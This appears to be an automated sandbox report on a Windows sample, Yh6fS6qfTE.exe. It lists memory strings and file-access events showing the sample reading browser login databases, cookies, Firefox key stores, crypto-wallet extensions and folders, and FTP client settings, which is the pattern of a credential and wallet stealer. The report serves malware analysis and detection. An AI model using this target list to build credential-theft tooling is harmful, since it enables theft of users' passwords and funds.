                Source: Yh6fS6qfTE.exe, 00000000.00000003.1514509667.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: lmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdigobghenbbaddojjnnaogfppfj","ez":"iWlt"},{"en":"kkpllkodjeloidieedojogacfhpaihoh","ez":"EnKrypt"},{"en":"amkmjjmmflddogmhpjloimipbofnfjih","ez":"W
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1434756137.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%app!
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Exodus
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1434756137.0000000001438000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%app!
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1434698733.000000000143F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents (4 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\PIVFAGEAAV (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\PWCCAWLGRE (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\SUAVTZKNFL (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\ZGGKNSUKOP (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\EWZCVGNOWT (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\NVWZAPQSQL (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\PIVFAGEAAV (2 times)
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe | Directory queried: C:\Users\user\Documents\PWCCAWLGRE
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
